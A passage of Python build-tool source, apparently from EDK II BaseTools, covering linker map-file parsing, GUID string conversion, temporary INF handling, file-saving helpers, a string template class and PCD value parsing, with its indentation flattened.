""" Parse map file generated by GCC linker """
status = 0
sections = []
varoffset = []
for index, line in enumerate(lines):
line = line.strip()
# status machine transection
if status == 0 and line == "Memory Configuration":
status = 1
continue
elif status == 1 and line == 'Linker script and memory map':
status = 2
continue
elif status ==2 and line == 'START GROUP':
status = 3
continue
# status handler
if status == 3:
m = valuePatternGcc.match(line)
if m is not None:
sections.append(m.groups(0))
for varname in varnames:
Str = ''
m = re.match("^.data.(%s)" % varname, line)
if m is not None:
m = re.match(".data.(%s)$" % varname, line)
if m is not None:
Str = lines[index + 1]
else:
Str = line[len(".data.%s" % varname):]
if Str:
m = pcdPatternGcc.match(Str.strip())
if m is not None:
varoffset.append((varname, int(m.groups(0)[0], 16), int(sections[-1][1], 16), sections[-1][0]))
if not varoffset:
return []
# get section information from efi file
efisecs = PeImageClass(efifilepath).SectionHeaderList
if efisecs is None or len(efisecs) == 0:
return []
#redirection
redirection = 0
for efisec in efisecs:
for section in sections:
if section[0].strip() == efisec[0].strip() and section[0].strip() == '.text':
redirection = int(section[1], 16) - efisec[1]
ret = []
for var in varoffset:
for efisec in efisecs:
if var[1] >= efisec[1] and var[1] < efisec[1]+efisec[3]:
ret.append((var[0], hex(efisec[2] + var[1] - efisec[1] - redirection)))
return ret
def _parseGeneral(lines, efifilepath, varnames):
status = 0 #0 - beginning of file; 1 - PE section definition; 2 - symbol table
secs = [] # key = section name
varoffset = []
symRe = re.compile('^([\da-fA-F]+):([\da-fA-F]+) +([\.:\\\\\w\?@\$]+) +([\da-fA-F]+)', re.UNICODE)
for line in lines:
line = line.strip()
if startPatternGeneral.match(line):
status = 1
continue
if addressPatternGeneral.match(line):
status = 2
continue
if line.startswith("entry point at"):
status = 3
continue
if status == 1 and len(line) != 0:
m = secReGeneral.match(line)
assert m is not None, "Fail to parse the section in map file , line is %s" % line
sec_no, sec_start, sec_length, sec_name, sec_class = m.groups(0)
secs.append([int(sec_no, 16), int(sec_start, 16), int(sec_length, 16), sec_name, sec_class])
if status == 2 and len(line) != 0:
for varname in varnames:
m = symRe.match(line)
assert m is not None, "Fail to parse the symbol in map file, line is %s" % line
sec_no, sym_offset, sym_name, vir_addr = m.groups(0)
sec_no = int(sec_no, 16)
sym_offset = int(sym_offset, 16)
vir_addr = int(vir_addr, 16)
# cannot pregenerate this RegEx since it uses varname from varnames.
m2 = re.match('^[_]*(%s)' % varname, sym_name)
if m2 is not None:
# fond a binary pcd entry in map file
for sec in secs:
if sec[0] == sec_no and (sym_offset >= sec[1] and sym_offset < sec[1] + sec[2]):
varoffset.append([varname, sec[3], sym_offset, vir_addr, sec_no])
if not varoffset: return []
# get section information from efi file
efisecs = PeImageClass(efifilepath).SectionHeaderList
if efisecs is None or len(efisecs) == 0:
return []
ret = []
for var in varoffset:
index = 0
for efisec in efisecs:
index = index + 1
if var[1].strip() == efisec[0].strip():
ret.append((var[0], hex(efisec[2] + var[2])))
elif var[4] == index:
ret.append((var[0], hex(efisec[2] + var[2])))
return ret
## Routine to process duplicated INF
#
# This function is called by following two cases:
# Case 1 in DSC:
# [components.arch]
# Pkg/module/module.inf
# Pkg/module/module.inf {
# <Defines>
# FILE_GUID = 0D1B936F-68F3-4589-AFCC-FB8B7AEBC836
# }
# Case 2 in FDF:
# INF Pkg/module/module.inf
# INF FILE_GUID = 0D1B936F-68F3-4589-AFCC-FB8B7AEBC836 Pkg/module/module.inf
#
# This function copies Pkg/module/module.inf to
# Conf/.cache/0D1B936F-68F3-4589-AFCC-FB8B7AEBC836module.inf
#
# @param Path Original PathClass object
# @param BaseName New file base name
#
# @retval return the new PathClass object
#
def ProcessDuplicatedInf(Path, BaseName, Workspace):
Filename = os.path.split(Path.File)[1]
if '.' in Filename:
Filename = BaseName + Path.BaseName + Filename[Filename.rfind('.'):]
else:
Filename = BaseName + Path.BaseName
#
# If -N is specified on command line, cache is disabled
# The directory has to be created
#
DbDir = os.path.split(GlobalData.gDatabasePath)[0]
if not os.path.exists(DbDir):
os.makedirs(DbDir)
#
# A temporary INF is copied to database path which must have write permission
# The temporary will be removed at the end of build
# In case of name conflict, the file name is
# FILE_GUIDBaseName (0D1B936F-68F3-4589-AFCC-FB8B7AEBC836module.inf)
#
TempFullPath = os.path.join(DbDir,
Filename)
RtPath = PathClass(Path.File, Workspace)
#
# Modify the full path to temporary path, keep other unchanged
#
# To build same module more than once, the module path with FILE_GUID overridden has
# the file name FILE_GUIDmodule.inf, but the relative path (self.MetaFile.File) is the real path
# in DSC which is used as relative path by C files and other files in INF.
# A trick was used: all module paths are PathClass instances, after the initialization
# of PathClass, the PathClass.Path is overridden by the temporary INF path.
#
# The reason for creating a temporary INF is:
# Platform.Modules which is the base to create ModuleAutoGen objects is a dictionary,
# the key is the full path of INF, the value is an object to save overridden library instances, PCDs.
# A different key for the same module is needed to create different output directory,
# retrieve overridden PCDs, library instances.
#
# The BaseName is the FILE_GUID which is also the output directory name.
#
#
RtPath.Path = TempFullPath
RtPath.BaseName = BaseName
#
# If file exists, compare contents
#
if os.path.exists(TempFullPath):
with open(str(Path), 'rb') as f1, open(TempFullPath, 'rb') as f2:
if f1.read() == f2.read():
return RtPath
_TempInfs.append(TempFullPath)
shutil.copy2(str(Path), TempFullPath)
return RtPath
## Remove temporary created INFs whose paths were saved in _TempInfs
#
def ClearDuplicatedInf():
while _TempInfs:
File = _TempInfs.pop()
if os.path.exists(File):
os.remove(File)
## Convert GUID string in xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx style to C structure style
#
# @param Guid The GUID string
#
# @retval string The GUID string in C structure style
#
def GuidStringToGuidStructureString(Guid):
GuidList = Guid.split('-')
Result = '{'
for Index in range(0, 3, 1):
Result = Result + '0x' + GuidList[Index] + ', '
Result = Result + '{0x' + GuidList[3][0:2] + ', 0x' + GuidList[3][2:4]
for Index in range(0, 12, 2):
Result = Result + ', 0x' + GuidList[4][Index:Index + 2]
Result += '}}'
return Result
## Convert GUID structure in byte array to xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx
#
# @param GuidValue The GUID value in byte array
#
# @retval string The GUID value in xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx format
#
def GuidStructureByteArrayToGuidString(GuidValue):
guidValueString = GuidValue.lower().replace("{", "").replace("}", "").replace(" ", "").replace(";", "")
guidValueList = guidValueString.split(",")
if len(guidValueList) != 16:
return ''
#EdkLogger.error(None, None, "Invalid GUID value string %s" % GuidValue)
try:
return "%02x%02x%02x%02x-%02x%02x-%02x%02x-%02x%02x-%02x%02x%02x%02x%02x%02x" % (
int(guidValueList[3], 16),
int(guidValueList[2], 16),
int(guidValueList[1], 16),
int(guidValueList[0], 16),
int(guidValueList[5], 16),
int(guidValueList[4], 16),
int(guidValueList[7], 16),
int(guidValueList[6], 16),
int(guidValueList[8], 16),
int(guidValueList[9], 16),
int(guidValueList[10], 16),
int(guidValueList[11], 16),
int(guidValueList[12], 16),
int(guidValueList[13], 16),
int(guidValueList[14], 16),
int(guidValueList[15], 16)
)
except:
return ''
## Convert GUID string in C structure style to xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx
#
# @param GuidValue The GUID value in C structure format
#
# @retval string The GUID value in xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx format
#
def GuidStructureStringToGuidString(GuidValue):
if not GlobalData.gGuidCFormatPattern.match(GuidValue):
return ''
guidValueString = GuidValue.lower().replace("{", "").replace("}", "").replace(" ", "").replace(";", "")
guidValueList = guidValueString.split(",")
if len(guidValueList) != 11:
return ''
#EdkLogger.error(None, None, "Invalid GUID value string %s" % GuidValue)
try:
return "%08x-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x" % (
int(guidValueList[0], 16),
int(guidValueList[1], 16),
int(guidValueList[2], 16),
int(guidValueList[3], 16),
int(guidValueList[4], 16),
int(guidValueList[5], 16),
int(guidValueList[6], 16),
int(guidValueList[7], 16),
int(guidValueList[8], 16),
int(guidValueList[9], 16),
int(guidValueList[10], 16)
)
except:
return ''
## Convert GUID string in C structure style to xxxxxxxx_xxxx_xxxx_xxxx_xxxxxxxxxxxx
#
# @param GuidValue The GUID value in C structure format
#
# @retval string The GUID value in xxxxxxxx_xxxx_xxxx_xxxx_xxxxxxxxxxxx format
#
def GuidStructureStringToGuidValueName(GuidValue):
guidValueString = GuidValue.lower().replace("{", "").replace("}", "").replace(" ", "")
guidValueList = guidValueString.split(",")
if len(guidValueList) != 11:
EdkLogger.error(None, FORMAT_INVALID, "Invalid GUID value string [%s]" % GuidValue)
return "%08x_%04x_%04x_%02x%02x_%02x%02x%02x%02x%02x%02x" % (
int(guidValueList[0], 16),
int(guidValueList[1], 16),
int(guidValueList[2], 16),
int(guidValueList[3], 16),
int(guidValueList[4], 16),
int(guidValueList[5], 16),
int(guidValueList[6], 16),
int(guidValueList[7], 16),
int(guidValueList[8], 16),
int(guidValueList[9], 16),
int(guidValueList[10], 16)
)
## Create directories
#
# @param Directory The directory name
#
def CreateDirectory(Directory):
if Directory is None or Directory.strip() == "":
return True
try:
if not os.access(Directory, os.F_OK):
os.makedirs(Directory)
except:
return False
return True
## Remove directories, including files and sub-directories in it
#
# @param Directory The directory name
#
def RemoveDirectory(Directory, Recursively=False):
if Directory is None or Directory.strip() == "" or not os.path.exists(Directory):
return
if Recursively:
CurrentDirectory = os.getcwd()
os.chdir(Directory)
for File in os.listdir("."):
if os.path.isdir(File):
RemoveDirectory(File, Recursively)
else:
os.remove(File)
os.chdir(CurrentDirectory)
os.rmdir(Directory)
## Store content in file
#
# This method is used to save file only when its content is changed. This is
# quite useful for "make" system to decide what will be re-built and what won't.
#
# @param File The path of file
# @param Content The new content of the file
# @param IsBinaryFile The flag indicating if the file is binary file or not
#
# @retval True If the file content is changed and the file is renewed
# @retval False If the file content is the same
#
def SaveFileOnChange(File, Content, IsBinaryFile=True):
if os.path.exists(File):
if IsBinaryFile:
try:
with open(File, "rb") as f:
if Content == f.read():
return False
except:
EdkLogger.error(None, FILE_OPEN_FAILURE, ExtraData=File)
else:
try:
with open(File, "r") as f:
if Content == f.read():
return False
except:
EdkLogger.error(None, FILE_OPEN_FAILURE, ExtraData=File)
DirName = os.path.dirname(File)
if not CreateDirectory(DirName):
EdkLogger.error(None, FILE_CREATE_FAILURE, "Could not create directory %s" % DirName)
else:
if DirName == '':
DirName = os.getcwd()
if not os.access(DirName, os.W_OK):
EdkLogger.error(None, PERMISSION_FAILURE, "Do not have write permission on directory %s" % DirName)
if IsBinaryFile:
try:
with open(File, "wb") as Fd:
Fd.write(Content)
except IOError as X:
EdkLogger.error(None, FILE_CREATE_FAILURE, ExtraData='IOError %s' % X)
else:
try:
with open(File, 'w') as Fd:
Fd.write(Content)
except IOError as X:
EdkLogger.error(None, FILE_CREATE_FAILURE, ExtraData='IOError %s' % X)
return True
## Retrieve and cache the real path name in file system
#
# @param Root The root directory of path relative to
#
# @retval str The path string if the path exists
# @retval None If path doesn't exist
#
class DirCache:
_CACHE_ = set()
_UPPER_CACHE_ = {}
def __init__(self, Root):
self._Root = Root
for F in os.listdir(Root):
self._CACHE_.add(F)
self._UPPER_CACHE_[F.upper()] = F
# =[] operator
def __getitem__(self, Path):
Path = Path[len(os.path.commonprefix([Path, self._Root])):]
if not Path:
return self._Root
if Path and Path[0] == os.path.sep:
Path = Path[1:]
if Path in self._CACHE_:
return os.path.join(self._Root, Path)
UpperPath = Path.upper()
if UpperPath in self._UPPER_CACHE_:
return os.path.join(self._Root, self._UPPER_CACHE_[UpperPath])
IndexList = []
LastSepIndex = -1
SepIndex = Path.find(os.path.sep)
while SepIndex > -1:
Parent = UpperPath[:SepIndex]
if Parent not in self._UPPER_CACHE_:
break
LastSepIndex = SepIndex
SepIndex = Path.find(os.path.sep, LastSepIndex + 1)
if LastSepIndex == -1:
return None
Cwd = os.getcwd()
os.chdir(self._Root)
SepIndex = LastSepIndex
while SepIndex > -1:
Parent = Path[:SepIndex]
ParentKey = UpperPath[:SepIndex]
if ParentKey not in self._UPPER_CACHE_:
os.chdir(Cwd)
return None
if Parent in self._CACHE_:
ParentDir = Parent
else:
ParentDir = self._UPPER_CACHE_[ParentKey]
for F in os.listdir(ParentDir):
Dir = os.path.join(ParentDir, F)
self._CACHE_.add(Dir)
self._UPPER_CACHE_[Dir.upper()] = Dir
SepIndex = Path.find(os.path.sep, SepIndex + 1)
os.chdir(Cwd)
if Path in self._CACHE_:
return os.path.join(self._Root, Path)
elif UpperPath in self._UPPER_CACHE_:
return os.path.join(self._Root, self._UPPER_CACHE_[UpperPath])
return None
def RealPath(File, Dir='', OverrideDir=''):
NewFile = os.path.normpath(os.path.join(Dir, File))
NewFile = GlobalData.gAllFiles[NewFile]
if not NewFile and OverrideDir:
NewFile = os.path.normpath(os.path.join(OverrideDir, File))
NewFile = GlobalData.gAllFiles[NewFile]
return NewFile
## Get GUID value from given packages
#
# @param CName The CName of the GUID
# @param PackageList List of packages looking-up in
# @param Inffile The driver file
#
# @retval GuidValue if the CName is found in any given package
# @retval None if the CName is not found in all given packages
#
def GuidValue(CName, PackageList, Inffile = None):
for P in PackageList:
GuidKeys = list(P.Guids.keys())
if Inffile and P._PrivateGuids:
if not Inffile.startswith(P.MetaFile.Dir):
GuidKeys = [x for x in P.Guids if x not in P._PrivateGuids]
if CName in GuidKeys:
return P.Guids[CName]
return None
return None
## A string template class
#
# This class implements a template for string replacement. A string template
# looks like following
#
# ${BEGIN} other_string ${placeholder_name} other_string ${END}
#
# The string between ${BEGIN} and ${END} will be repeated as many times as the
# length of "placeholder_name", which is a list passed through a dict. The
# "placeholder_name" is the key name of the dict. The ${BEGIN} and ${END} can
# be not used and, in this case, the "placeholder_name" must not a list and it
# will just be replaced once.
#
class TemplateString(object):
_REPEAT_START_FLAG = "BEGIN"
_REPEAT_END_FLAG = "END"
class Section(object):
_LIST_TYPES = [type([]), type(set()), type((0,))]
def __init__(self, TemplateSection, PlaceHolderList):
self._Template = TemplateSection
self._PlaceHolderList = []
# Split the section into sub-sections according to the position of placeholders
if PlaceHolderList:
self._SubSectionList = []
SubSectionStart = 0
#
# The placeholders passed in must be in the format of
#
# PlaceHolderName, PlaceHolderStartPoint, PlaceHolderEndPoint
#
for PlaceHolder, Start, End in PlaceHolderList:
self._SubSectionList.append(TemplateSection[SubSectionStart:Start])
self._SubSectionList.append(TemplateSection[Start:End])
self._PlaceHolderList.append(PlaceHolder)
SubSectionStart = End
if SubSectionStart < len(TemplateSection):
self._SubSectionList.append(TemplateSection[SubSectionStart:])
else:
self._SubSectionList = [TemplateSection]
def __str__(self):
return self._Template + " : " + str(self._PlaceHolderList)
def Instantiate(self, PlaceHolderValues):
RepeatTime = -1
RepeatPlaceHolders = {}
NonRepeatPlaceHolders = {}
for PlaceHolder in self._PlaceHolderList:
if PlaceHolder not in PlaceHolderValues:
continue
Value = PlaceHolderValues[PlaceHolder]
if type(Value) in self._LIST_TYPES:
if RepeatTime < 0:
RepeatTime = len(Value)
elif RepeatTime != len(Value):
EdkLogger.error(
"TemplateString",
PARAMETER_INVALID,
"${%s} has different repeat time from others!" % PlaceHolder,
ExtraData=str(self._Template)
)
RepeatPlaceHolders["${%s}" % PlaceHolder] = Value
else:
NonRepeatPlaceHolders["${%s}" % PlaceHolder] = Value
if NonRepeatPlaceHolders:
StringList = []
for S in self._SubSectionList:
if S not in NonRepeatPlaceHolders:
StringList.append(S)
else:
StringList.append(str(NonRepeatPlaceHolders[S]))
else:
StringList = self._SubSectionList
if RepeatPlaceHolders:
TempStringList = []
for Index in range(RepeatTime):
for S in StringList:
if S not in RepeatPlaceHolders:
TempStringList.append(S)
else:
TempStringList.append(str(RepeatPlaceHolders[S][Index]))
StringList = TempStringList
return "".join(StringList)
## Constructor
def __init__(self, Template=None):
self.String = []
self.IsBinary = False
self._Template = Template
self._TemplateSectionList = self._Parse(Template)
## str() operator
#
# @retval string The string replaced
#
def __str__(self):
return "".join(self.String)
## Split the template string into fragments per the ${BEGIN} and ${END} flags
#
# @retval list A list of TemplateString.Section objects
#
def _Parse(self, Template):
SectionStart = 0
SearchFrom = 0
MatchEnd = 0
PlaceHolderList = []
TemplateSectionList = []
while Template:
MatchObj = gPlaceholderPattern.search(Template, SearchFrom)
if not MatchObj:
if MatchEnd <= len(Template):
TemplateSection = TemplateString.Section(Template[SectionStart:], PlaceHolderList)
TemplateSectionList.append(TemplateSection)
break
MatchString = MatchObj.group(1)
MatchStart = MatchObj.start()
MatchEnd = MatchObj.end()
if MatchString == self._REPEAT_START_FLAG:
if MatchStart > SectionStart:
TemplateSection = TemplateString.Section(Template[SectionStart:MatchStart], PlaceHolderList)
TemplateSectionList.append(TemplateSection)
SectionStart = MatchEnd
PlaceHolderList = []
elif MatchString == self._REPEAT_END_FLAG:
TemplateSection = TemplateString.Section(Template[SectionStart:MatchStart], PlaceHolderList)
TemplateSectionList.append(TemplateSection)
SectionStart = MatchEnd
PlaceHolderList = []
else:
PlaceHolderList.append((MatchString, MatchStart - SectionStart, MatchEnd - SectionStart))
SearchFrom = MatchEnd
return TemplateSectionList
## Replace the string template with dictionary of placeholders and append it to previous one
#
# @param AppendString The string template to append
# @param Dictionary The placeholder dictionaries
#
def Append(self, AppendString, Dictionary=None):
if Dictionary:
SectionList = self._Parse(AppendString)
self.String.append( "".join(S.Instantiate(Dictionary) for S in SectionList))
else:
if isinstance(AppendString,list):
self.String.extend(AppendString)
else:
self.String.append(AppendString)
## Replace the string template with dictionary of placeholders
#
# @param Dictionary The placeholder dictionaries
#
# @retval str The string replaced with placeholder values
#
def Replace(self, Dictionary=None):
return "".join(S.Instantiate(Dictionary) for S in self._TemplateSectionList)
## Progress indicator class
#
# This class makes use of thread to print progress on console.
#
class Progressor:
# for avoiding deadloop
_StopFlag = None
_ProgressThread = None
_CheckInterval = 0.25
## Constructor
#
# @param OpenMessage The string printed before progress characters
# @param CloseMessage The string printed after progress characters
# @param ProgressChar The character used to indicate the progress
# @param Interval The interval in seconds between two progress characters
#
def __init__(self, OpenMessage="", CloseMessage="", ProgressChar='.', Interval=1.0):
self.PromptMessage = OpenMessage
self.CodaMessage = CloseMessage
self.ProgressChar = ProgressChar
self.Interval = Interval
if Progressor._StopFlag is None:
Progressor._StopFlag = threading.Event()
## Start to print progress character
#
# @param OpenMessage The string printed before progress characters
#
def Start(self, OpenMessage=None):
if OpenMessage is not None:
self.PromptMessage = OpenMessage
Progressor._StopFlag.clear()
if Progressor._ProgressThread is None:
Progressor._ProgressThread = threading.Thread(target=self._ProgressThreadEntry)
Progressor._ProgressThread.setDaemon(False)
Progressor._ProgressThread.start()
## Stop printing progress character
#
# @param CloseMessage The string printed after progress characters
#
def Stop(self, CloseMessage=None):
OriginalCodaMessage = self.CodaMessage
if CloseMessage is not None:
self.CodaMessage = CloseMessage
self.Abort()
self.CodaMessage = OriginalCodaMessage
## Thread entry method
def _ProgressThreadEntry(self):
sys.stdout.write(self.PromptMessage + " ")
sys.stdout.flush()
TimeUp = 0.0
while not Progressor._StopFlag.isSet():
if TimeUp <= 0.0:
sys.stdout.write(self.ProgressChar)
sys.stdout.flush()
TimeUp = self.Interval
time.sleep(self._CheckInterval)
TimeUp -= self._CheckInterval
sys.stdout.write(" " + self.CodaMessage + "\n")
sys.stdout.flush()
## Abort the progress display
@staticmethod
def Abort():
if Progressor._StopFlag is not None:
Progressor._StopFlag.set()
if Progressor._ProgressThread is not None:
Progressor._ProgressThread.join()
Progressor._ProgressThread = None
## Dictionary using prioritized list as key
#
class tdict:
_ListType = type([])
_TupleType = type(())
_Wildcard = 'COMMON'
_ValidWildcardList = ['COMMON', 'DEFAULT', 'ALL', TAB_STAR, 'PLATFORM']
def __init__(self, _Single_=False, _Level_=2):
self._Level_ = _Level_
self.data = {}
self._Single_ = _Single_
# =[] operator
def __getitem__(self, key):
KeyType = type(key)
RestKeys = None
if KeyType == self._ListType or KeyType == self._TupleType:
FirstKey = key[0]
if len(key) > 1:
RestKeys = key[1:]
elif self._Level_ > 1:
RestKeys = [self._Wildcard for i in range(0, self._Level_ - 1)]
else:
FirstKey = key
if self._Level_ > 1:
RestKeys = [self._Wildcard for i in range(0, self._Level_ - 1)]
if FirstKey is None or str(FirstKey).upper() in self._ValidWildcardList:
FirstKey = self._Wildcard
if self._Single_:
return self._GetSingleValue(FirstKey, RestKeys)
else:
return self._GetAllValues(FirstKey, RestKeys)
def _GetSingleValue(self, FirstKey, RestKeys):
Value = None
#print "%s-%s" % (FirstKey, self._Level_) ,
if self._Level_ > 1:
if FirstKey == self._Wildcard:
if FirstKey in self.data:
Value = self.data[FirstKey][RestKeys]
if Value is None:
for Key in self.data:
Value = self.data[Key][RestKeys]
if Value is not None: break
else:
if FirstKey in self.data:
Value = self.data[FirstKey][RestKeys]
if Value is None and self._Wildcard in self.data:
#print "Value=None"
Value = self.data[self._Wildcard][RestKeys]
else:
if FirstKey == self._Wildcard:
if FirstKey in self.data:
Value = self.data[FirstKey]
if Value is None:
for Key in self.data:
Value = self.data[Key]
if Value is not None: break
else:
if FirstKey in self.data:
Value = self.data[FirstKey]
elif self._Wildcard in self.data:
Value = self.data[self._Wildcard]
return Value
def _GetAllValues(self, FirstKey, RestKeys):
Value = []
if self._Level_ > 1:
if FirstKey == self._Wildcard:
for Key in self.data:
Value += self.data[Key][RestKeys]
else:
if FirstKey in self.data:
Value += self.data[FirstKey][RestKeys]
if self._Wildcard in self.data:
Value += self.data[self._Wildcard][RestKeys]
else:
if FirstKey == self._Wildcard:
for Key in self.data:
Value.append(self.data[Key])
else:
if FirstKey in self.data:
Value.append(self.data[FirstKey])
if self._Wildcard in self.data:
Value.append(self.data[self._Wildcard])
return Value
## []= operator
def __setitem__(self, key, value):
KeyType = type(key)
RestKeys = None
if KeyType == self._ListType or KeyType == self._TupleType:
FirstKey = key[0]
if len(key) > 1:
RestKeys = key[1:]
else:
RestKeys = [self._Wildcard for i in range(0, self._Level_ - 1)]
else:
FirstKey = key
if self._Level_ > 1:
RestKeys = [self._Wildcard for i in range(0, self._Level_ - 1)]
if FirstKey in self._ValidWildcardList:
FirstKey = self._Wildcard
if FirstKey not in self.data and self._Level_ > 0:
self.data[FirstKey] = tdict(self._Single_, self._Level_ - 1)
if self._Level_ > 1:
self.data[FirstKey][RestKeys] = value
else:
self.data[FirstKey] = value
def SetGreedyMode(self):
self._Single_ = False
if self._Level_ > 1:
for Key in self.data:
self.data[Key].SetGreedyMode()
def SetSingleMode(self):
self._Single_ = True
if self._Level_ > 1:
for Key in self.data:
self.data[Key].SetSingleMode()
def GetKeys(self, KeyIndex=0):
assert KeyIndex >= 0
if KeyIndex == 0:
return set(self.data.keys())
else:
keys = set()
for Key in self.data:
keys |= self.data[Key].GetKeys(KeyIndex - 1)
return keys
def AnalyzePcdExpression(Setting):
RanStr = ''.join(sample(string.ascii_letters + string.digits, 8))
Setting = Setting.replace('\\\\', RanStr).strip()
# There might be escaped quote in a string: \", \\\" , \', \\\'
Data = Setting
# There might be '|' in string and in ( ... | ... ), replace it with '-'
NewStr = ''
InSingleQuoteStr = False
InDoubleQuoteStr = False
Pair = 0
for Index, ch in enumerate(Data):
if ch == '"' and not InSingleQuoteStr:
if Data[Index - 1] != '\\':
InDoubleQuoteStr = not InDoubleQuoteStr
elif ch == "'" and not InDoubleQuoteStr:
if Data[Index - 1] != '\\':
InSingleQuoteStr = not InSingleQuoteStr
elif ch == '(' and not (InSingleQuoteStr or InDoubleQuoteStr):
Pair += 1
elif ch == ')' and not (InSingleQuoteStr or InDoubleQuoteStr):
Pair -= 1
if (Pair > 0 or InSingleQuoteStr or InDoubleQuoteStr) and ch == TAB_VALUE_SPLIT:
NewStr += '-'
else:
NewStr += ch
FieldList = []
StartPos = 0
while True:
Pos = NewStr.find(TAB_VALUE_SPLIT, StartPos)
if Pos < 0:
FieldList.append(Setting[StartPos:].strip())
break
FieldList.append(Setting[StartPos:Pos].strip())
StartPos = Pos + 1
for i, ch in enumerate(FieldList):
if RanStr in ch:
FieldList[i] = ch.replace(RanStr,'\\\\')
return FieldList
def ParseFieldValue (Value):
def ParseDevPathValue (Value):
if '\\' in Value:
Value.replace('\\', '/').replace(' ', '')
Cmd = 'DevicePath ' + '"' + Value + '"'
try:
p = subprocess.Popen(Cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
out, err = p.communicate()
except Exception as X:
raise BadExpression("DevicePath: %s" % (str(X)) )
finally:
subprocess._cleanup()
p.stdout.close()
p.stderr.close()
if err:
raise BadExpression("DevicePath: %s" % str(err))
out = out.decode(encoding='utf-8', errors='ignore')
Size = len(out.split())
out = ','.join(out.split())
return '{' + out + '}', Size
if "{CODE(" in Value:
return Value, len(Value.split(","))
if isinstance(Value, type(0)):
return Value, (Value.bit_length() + 7) // 8
if not isinstance(Value, type('')):
raise BadExpression('Type %s is %s' %(Value, type(Value)))
Value = Value.strip()
if Value.startswith(TAB_UINT8) and Value.endswith(')'):
Value, Size = ParseFieldValue(Value.split('(', 1)[1][:-1])
if Size > 1:
raise BadExpression('Value (%s) Size larger than %d' %(Value, Size))
return Value, 1
if Value.startswith(TAB_UINT16) and Value.endswith(')'):
Value, Size = ParseFieldValue(Value.split('(', 1)[1][:-1])
if Size > 2:
raise BadExpression('Value (%s) Size larger than %d' %(Value, Size))
return Value, 2
if Value.startswith(TAB_UINT32) and Value.endswith(')'):
Value, Size = ParseFieldValue(Value.split('(', 1)[1][:-1])
if Size > 4:
raise BadExpression('Value (%s) Size larger than %d' %(Value, Size))
return Value, 4
if Value.startswith(TAB_UINT64) and Value.endswith(')'):
Value, Size = ParseFieldValue(Value.split('(', 1)[1][:-1])
if Size > 8:
raise BadExpression('Value (%s) Size larger than %d' % (Value, Size))
return Value, 8
if Value.startswith(TAB_GUID) and Value.endswith(')'):
Value = Value.split('(', 1)[1][:-1].strip()
if Value[0] == '{' and Value[-1] == '}':
TmpValue = GuidStructureStringToGuidString(Value)
if not TmpValue:
raise BadExpression("Invalid GUID value string %s" % Value)
Value = TmpValue
if Value[0] == '"' and Value[-1] == '"':
Value = Value[1:-1]
try:
Value = str(uuid.UUID(Value).bytes_le)
if Value.startswith("b'"):
Value = Value[2:-1]
Value = "'" + Value + "'"
except ValueError as Message:
raise BadExpression(Message)
Value, Size = ParseFieldValue(Value)
return Value, 16
if Value.startswith('L"') and Value.endswith('"'):
# Unicode String
# translate escape character
Value = Value[1:]
try:
Value = eval(Value)
except:
Value = Value[1:-1]
List = list(Value)
List.reverse()
Value = 0
for Char in List:
Value = (Value << 16) | ord(Char)
return Value, (len(List) + 1) * 2
if Value.startswith('"') and Value.endswith('"'):
# ASCII String
# translate escape character
try:
Value = eval(Value)
except:
Value = Value[1:-1]
List = list(Value)
List.reverse()
Value = 0
for Char in List:
Value = (Value << 8) | ord(Char)
return Value, len(List) + 1
if Value.startswith("L'") and Value.endswith("'"):
# Unicode Character Constant
# translate escape character
Value = Value[1:]
try:
Value = eval(Value)
except:
Value = Value[1:-1]
List = list(Value)
if len(List) == 0:
raise BadExpression('Length %s is %s' % (Value, len(List)))
List.reverse()
Value = 0
for Char in List:
Value = (Value << 16) | ord(Char)
return Value, len(List) * 2
if Value.startswith("'") and Value.endswith("'"):
# Character constant
# translate escape character
try:
Value = eval(Value)
except:
Value = Value[1:-1]
List = list(Value)
if len(List) == 0:
raise BadExpression('Length %s is %s' % (Value, len(List)))
List.reverse()
Value = 0
for Char in List:
Value = (Value << 8) | ord(Char)
return Value, len(List)
if Value.startswith('{') and Value.endswith('}'):
# Byte array
Value = Value[1:-1]
List = [Item.strip() for Item in Value.split(',')]
List.reverse()
Value = 0
RetSize = 0
for Item in List:
ItemValue, Size = ParseFieldValue(Item)
RetSize += Size
for I in range(Size):
Value = (Value << 8) | ((ItemValue >> 8 * I) & 0xff)
return Value, RetSize
if Value.startswith('DEVICE_PATH(') and Value.endswith(')'):
Value = Value.replace("DEVICE_PATH(", '').rstrip(')')
Value = Value.strip().strip('"')
return ParseDevPathValue(Value)
if Value.lower().startswith('0x'):
try:
Value = int(Value, 16)
except:
raise BadExpression("invalid hex value: %s" % Value)
if Value == 0:
return 0, 1
return Value, (Value.bit_length() + 7) // 8
if Value[0].isdigit():
Value = int(Value, 10)
if Value == 0:
return 0, 1
return Value, (Value.bit_length() + 7) // 8
if Value.lower() == 'true':
return 1, 1
if Value.lower() == 'false':
return 0, 1
return Value, 1
## AnalyzeDscPcd
#
# Analyze DSC PCD value, since there is no data type info in DSC
# This function is used to match functions (AnalyzePcdData) used for retrieving PCD value from database
# 1. Feature flag: TokenSpace.PcdCName|PcdValue
# 2. Fix and Patch:TokenSpace.PcdCName|PcdValue[|VOID*[|MaxSize]]
# 3. Dynamic default:
# TokenSpace.PcdCName|PcdValue[|VOID*[|MaxSize]]
# TokenSpace.PcdCName|PcdValue
# 4. Dynamic VPD:
# TokenSpace.PcdCName|VpdOffset[|VpdValue]
# TokenSpace.PcdCName|VpdOffset[|MaxSize[|VpdValue]]
# 5. Dynamic HII:
# TokenSpace.PcdCName|HiiString|VariableGuid|VariableOffset[|HiiValue]
# PCD value needs to be located in such kind of string, and the PCD value might be an expression in which
# there might have "|" operator, also in string value.
#
# @param Setting: String contain information described above with "TokenSpace.PcdCName|" stripped
# @param PcdType: PCD type: feature, fixed, dynamic default VPD HII
# @param DataType: The datum type of PCD: VOID*, UNIT, BOOL
# @retval:
# ValueList: A List contain fields described above
# IsValid: True if conforming EBNF, otherwise False
# Index: The index where PcdValue is in ValueList
#
def AnalyzeDscPcd(Setting, PcdType, DataType=''):
FieldList = AnalyzePcdExpression(Setting)
IsValid = True
